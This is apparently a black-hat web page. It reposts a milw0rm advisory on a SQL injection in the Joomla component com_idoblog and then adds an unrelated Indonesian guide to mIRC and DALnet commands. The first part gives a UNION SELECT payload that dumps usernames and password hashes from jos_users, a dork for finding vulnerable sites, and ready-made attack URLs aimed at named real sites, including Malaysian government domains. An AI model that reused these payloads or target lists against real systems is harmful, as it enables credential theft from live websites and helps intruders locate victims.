Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

#####################################################################################
#### com_idoblog SQL Injection ALL VERSIONS ####
#####################################################################################
# #
# Descubierto por : KKR #
# Somos: knet, kiko, ricota, servl #
# Contacto: elricota[*A*T*]gmail[*D*O*T]com #
#####################################################################################
[+] Ediciones anteriores tenian las mismas fallas pero no fixearon todo...
[+] Esta sql injection afecta todas las versiones.
[-]
[+] exploit:
[-] /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[+]
[-] Ejemplo:
[+] http://www.rayservpc.co.uk/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[-]
[+] d0rk: inurl:"com_idoblog"
[-] http://www.diosdelared.com // http://www.remoteexecution.net/foro/
[-----------------------------------------------------------------------------------]

note:
idoblog
17 07 2008
Sunshine studio
kotofeus@mail.ru
http://sunshinestudio.ru
Sunshine studio
Creative Commons v3.0
v 1.1 (build 30)
Blogs-system for Joomla 1.5

# milw0rm.com [2009-08-11]

====================================================================

http://www.jawi.gov.my/melayu/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

http://www.agc.gov.my/agc/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

http://www.mcalabuan.org.my/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=69+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--


Let's start the party Razz Razz Razz Razz Razz

Panduan Chat mIRC, #BanjarHackerLink @DalNet

/nick (nick baru) = mengganti nickname anda
/notice (nick) (pesan) = notice ke nick
/join (#channel) = masuk chennel
/say (pesan) = seperti chat biasa
/part (#channel) = keluar dari channel
/msg (nick) (pesan) = kirim msg ke nick
/quit = keluar dari IRC
/notify (nick) = agar tau nick tersebut online / tidak
/notify - (nick) = menghilangkan (nick) dari notify list
/quit (pesan) = quit dengan pesan kamu
/server (nama server) = ganti server
/query (nick) = private msg ke user
/invite (nick) (#channel) = invite user
/dcc chat (nick) = dcc chat ke nick
/dcc send (nick) (filename) = kirim file
/mode (nick kamu) +I = ubah mode menjadi invisible (tidak kelihatan di /who #channel oleh orang)
/ignore (nick) atau /ignore *@IPnya = abaikan user, semua tulisannya tidak akan kita lihat
/me (pesan) = action, hasilnya *(nick) (pesan)
untuk diminculkan ke semua channel yang kita OL
/list = melihat list semua chennel
/who (nick/#channel) = melihat keterangan user atau chennel
/whois (nick) = melihat keterangan ttg user
/away (pesan) = pergi sesaat dengan pesan
/away = menyatakan balik dari away
/ctcp (nick) ping = periksa berapa lama ketikan kamu sampai ke user
/ctcp (nick kamu) ping = cek lag kamu sendiri
/uwho (nick) = melihat U central nick
/clear = bersihkan layar aktif

Perintah Standar Untuk Operator Channel

/kick (#channel) (nick) = kick user
/topic (#channel) (topiknya) = mengganti topik channel
/kick (nick) (#channel) (alasan) = kick user dengan alasan
/mode (#channel) +b *!*@IPnya = Band IP user
/mode (#channel) +b nick! username@host.add.ress = Ban user
/mode (#channel) –b *!*@IPnya = buka Ban user, missal /mode #dewata +b *!*@202..133.80.*
/mode (#channel) +o (nick) = memberikan Op pada user
/mode (#channel) +v (nick) = memberikan voice pada user
/mode (#channel) – o (nick) = menurunkan user agar tidak Op lagi
/mode (#channel) –v (nick) = mengambil voice user
/mode (#channel) +/- ntispklRrmc = set mode channel
/channel = melihat mode dan ban list channel

/mode #ch +vvv n1 n2 n3 = memberi voice ke byk orang
/chanserv sop #ch add nick = memberi SOP

Perintah ChanServ Dalnet

ket: (A) = semua, (AOP) = minimal aop, (SOP) = minimal sop, (F) = founder

/chanserv info (#channel) = melihat info channel (A)
/chanserv invite (#channel) (nick) = minta chanserv untuk invite (A)
/chanserv unban (#channel) (nick kamu) = Unban diri kamu (AOP)
/chanserv unban (#channel) * = unban semuanya (AOP)
/chanserv register (#channel) (passwd) (desikripsi) = register channel baru (F)
/chanserv identify (#channel) (passwd) = identify channel (F)
/chanserv drop (#channel) = drop channel (F)
/chanserv set (#channel) passwd (pass baru) = ganti password channel (F)
/chanserv set (#channel) founder = set sbg founder baru (F)
/chanserv set (#channel) desc (deskripsinya) = set deskripsi channel (F)
/chanserv set (#channel) topic (topiknya) = set topik channel (F)
/chanserv set (#channel) url (alamat url-nya) = set webpage channel (F)
/chanserv set (#channel) mlock (tulis modenya) = set kunci mode channel mis. +nt-ispklR (F)
/chanserv set (#channel) ident (on/off) = set ident aktif/tidak (F)
/chanserv set (#channel) restrict (on/off) = set restrict channel (F)
/chanserv set (#channel) keeptopic (on/off) = set keep topik channel (F)
/chanserv set (#channel) topiclock (sop/founder/off) = set topiklock channel (F)
/chanserv set (#channel) opguard (on/off) = set opguard
/chanserv set (#channel) memo (none/aop/sop/founder) = set memo level channel (F)
/chanserv why (#channel) (nick) = melihat akses yang dipakai nick untuk jadi op (AOP)
/chanserv op (#channel) (nick) = mengangkat menjadi op (AOP)
/chanserv deop (#channel) (nick) = menurunkan dari op (AOP)
/chanserv (aop/sop/akick) (#channel) list = melihat daftar aop, sop, atau akick
/chanserv aop (#channel) add (nick) = jadikan aop (SOP)
/chanserv sop (#channel) add (nick) = jadikan sop (F)
/chanserv aop (#channel) del (no. list aop) = hapus aop (SOP)
/chanserv sop (#channel) del (no. list sop) = hapus sop (F)
/chanserv (aop/sop/akick) (#channel) (add/del) nick!username@host.add.ress = masukkan/hapus dari list (SOP)
/chanserv mdeop (#channel) = mass deop channel, tapi aop tdk bisa deop sop dan founder (AOP)
/chanserv mkick (#channel) = mass kick channel (SOP)

/cs set #chanel mlock +nt-c <<<<<<<<<<<<<<<<<<, khusus fo ngeset chanel biar yg lain ga bisa ganti

/cs set #chanel opguard on <<<<<<<<<<<<<<<<<<<, supaya op yang di add aja yg bisa naek

/timer 0 30 /ping $me lioat ping

Perintah NickServ Dalnet

/nickserv register (password) (email) = register nick
/nickserv ghost (nick) (passwd) = kill ghost yaitu bila nick dipakai orang atau tertinggal di channel
/nickserv identify (password) = identify nick
/nickserv set kill (on/off) = set kill nick
/nickserv recover (nick) (passwd) = recover nick
/nickserv release (nick) = release nick
/nickserv drop (nick) = drop nick
/nickserv set passwd (passwd baru) = ganti password nick
/nickserv set noop (on/off) = set no op untuk nick
/nickserv set nomemo (on/off) = set no memo untuk nick
/nickserv info (nick) = mengetahui informasi tentang nick

Perintah MemoServ Dalnet

/memoserv list = melihat daftar memo anda
/memoserv send (nick) (pesan) = kirim memo
/memoserv send (#channel) (pesan) = kirim memo ke op
/memoserv read (no. list memo) = baca memo yang ke berapa (sesuai list memo)
/memoserv del (no. list memo) = hapus memo no di list
/memoserv undel (no. list memo) = undel memo

DALnet Servers

Ketikkan /server (namaServer) untuk ganti server
contoh: /server hotspeed.sg.as.dal.net

CA Servers :Canada

/server maple.ix.ca.dal.net

EU Servers :Eropa

/server mozilla.se.eu.dal.net
/server powertech.no.eu.dal.net
/server slimey.uk.eu.dal.net
/server genesis-r.uk.eu.dal.net
/server matrix.de.eu.dal.net
/server arcor.de.eu.dal.net

AS Servers :Asia

/server hotspeed.sg.as.dal.net
/server mesra.kl.my.dal.net

US Servers :Amerika Serikat

/server aeon.nj.us.dal.net
/server broadway.ny.us.dal.net
/server hollywood.ix.us.dal.net
/server jade.va.us.dal.net
/server jingo.ix.us.dal.net
/server loyalty.ix.us.dal.net
/server masters.ix.us.dal.net
/server novel.fl.us.dal.net
/server redemption.ix.us.dal.net
/server rumble.fl.us.dal.net
/server serenity.ix.us.dal.net
/server soho.ix.us.dal.net

R3B3L - Design by : R3B3L @ 2010 - 2011 All Rights Reserved [+] We Are Black Hat [+]